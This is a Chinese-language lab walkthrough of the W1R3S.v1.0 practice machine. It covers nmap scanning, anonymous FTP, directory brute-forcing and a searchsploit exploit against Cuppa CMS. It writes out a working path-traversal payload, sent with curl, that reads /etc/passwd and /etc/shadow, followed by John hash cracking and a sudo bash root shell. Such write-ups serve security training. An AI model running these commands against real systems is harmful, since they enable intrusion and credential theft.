打靶笔记w1r3s.v1.0
打靶笔记w1r3s.v1.0
nmap扫描与分析
主机发现
nmap -sn 192.168.218.0/24
历史版本为-sP(已经被放弃)
n 不进行端口扫描
192.168.218.155
创建文件夹保存端口信息
指定最低1万速率扫描所有端口
nmap -sT --min-rate 10000 -p- 192.168.218.155 nmapscan/ports
-sS SYN扫描是快速扫描(有时防火墙会有SYN过滤)
而-sT 是完整tcp三次握手扫描(准,隐蔽性)
10000 避免判定恶意、网络、打靶能承受(速度平衡)
-p 端口
- 1-65535简写
0 输出
A 所有文件格式
gnmap格式已经被放弃,处于历史延续性被保留
nmap与屏幕输出一样
xml不言而喻
提取端口
grep open nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ','
详细信息扫描(分析重点)
nmap -sT -sV -sC -O -p21,22,80,3306 192.168.218.155 -oA nmapscan/detail
-sC 默认脚本扫描
80权重最重
3306可能有弱密码访问权限,可能配合其他环境完成利用
22在渗透方面排后,通过ssh拿到登录权限意义不大
20min不能拿到进一步结果就要切换下一个攻击向量
结合环境判断选择
udp扫描
nmap -sU --top-ports 20 192.168.218.155 -oA nmapscan/udp
--top-ports 前20
默认脚本扫描
nmap --script=vuln -p21,22,80,3306 192.168.218.155 -oA nmapscan/vuln
21、22并没有更多的信息
80提示没有csrf、xsrf,提示有dos攻击(基本不会选,过于暴力,没有技术含量),没有找到关于DOM的XSS
mysql试探
3306也没有新的发现
ftp渗透
匿名用户登录成功
使用binary切换到二进制模式
ftp交互命令行可以用?显示
先关闭交互式,不用每次确认
下载,将三个文件内容全部下载到kali分析
mget *.txt
将txt文件一起读出来
一个是md5、一个是base64
不知道什么加密可以使用kali工具hash-identifier
来识别
SXQgaXMgZWFzeSwgYnV0IG5vdCB0aGF0IGVhc3kuLg==
It is easy, but not that easy..
01ec2d8fc11c493b25029fb1f47f39ce
This is not a password
初学者尽量使用kali自带工具,在比赛中可能没有脚本工具,复杂破解不出来,这题还得用破解网站去做
我们用明文校验一下,正确
他用使用ASCII码输出 the W1R3S.inc
以及这家公司员工列表
后面逆序和反转文字,可以选择截屏进行旋转,使用在线工具
we have a ןot of work to do‘ stop pןayıng around˙˙˙˙
ı don't thınk thıs ıs the way to root!
我们有很多工作要做'停止 pןayıng 在 ̇ ̇ ̇ ̇ ̇ 周围
不要 thınk thıs 是根的方式!
21端口目前信息就这些了,22端口优先级排后,暂时不看
看3306,使用空密码,说错误 1130 (HY000):不允许主机“192.168.218.145”连接到此 MySQL 服务器
不允许kali连接,暂时不成功
web渗透
然后看源码,简单html布局,css代码,标题与注释目前也没有作用提示
目录爆破
gobuster dir -u http://192.168.218.155 --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
看到administrator可以打开,页面的title显示是CUppa CMS ,程序安装页面
奇怪的是进入wordpress自动跳转到localhost页面
目前没有将所有信息进行验证,暂时将kali设置localhost等配置优先级排后
cuppa cms渗透
执行next(在实际过程中,因为在没有进去对网站进行不可逆操作,可能被管理员发现,我们应该对此有预期)
继续下一步
配制文件、创建表格正常;管理员用户创建失败
只有back、回去、看一下源码;也没有获取有用信息
只要是管理系统,就会有大大小小的漏洞;循着这个思路searchsploit(数据库搜索工具)找一下
searchsploit搜索的是https://www.exploit-db.com/的本地copy;他是不联网的
如果有多个,就一条一条试;并不一定都成
searchsploit cuppa -m 25971
-m 实际上等于做了一个镜像
cuppa cms 25791利用
把25971下载到当前路径
分析漏洞如何利用
先测试下漏洞是否存在,根据txt测试
测试装在cuppa文件夹下
http://192.168.218.155/cuppa/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
那可能cuppa在安装中被指定administrator目录;这么去推断;这个只能去猜,简单的猜
http://192.168.218.155/administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd
ok这个是显示;但是并没有读取出passwd,看一下源码;源码也没有泄露出passwd信息
有内容,没有读出来,按照给的txt就是这么操作的
alertConfig是作为参数给出来的,一般作为参数是用get方式处理数据的,但是程序的处理逻辑未必是这样
txt中还有base64编码的问题,这是在利用中提到的一点,我们要在利用中进行尝试;可以用burp
可以做代码审计的,他是服务管理系统,有软件链接,
使用wget下载
txt说文件22行,这个是样式文件,还是用关键字寻找吧
在alerts的文件下,源码有些变化;漏洞依然是存在的;它是用POST方式传输,并且没有做任何处理,那这样就简单了,可以用burp site也可以用命令行工具
curl有一个对url进行编码,并且通过POST方式进行传递
curl --data-urlencode 'urlConfig=../../../../../../../../../etc/passwd' http://192.168.218.155/administrator/alerts/alertConfigField.php
看到已经列出passwd内容
每个用户第二段都是x,证明密码以哈希方式存在shadow中;所以回去找shadow文件
火狐方法
shadow文件
是可以的
将没有hash的用户删掉;目前有root、www-data、w1r3s用户
john破解shadow
丢给John破解
获得系统立足点和提权
使用ssh连接w1r3s
提示是正确的路吗
哦 可能
成功
查看sudo -l
拥有全部权限
用sudo 启动bash会话
找到flag
ssh暴力破解
不推荐思路
同也可以破解出来
w1r3s.v1.0靶机总结
不要忽略udp、ipv6
兔子洞不重要,要逐一尝试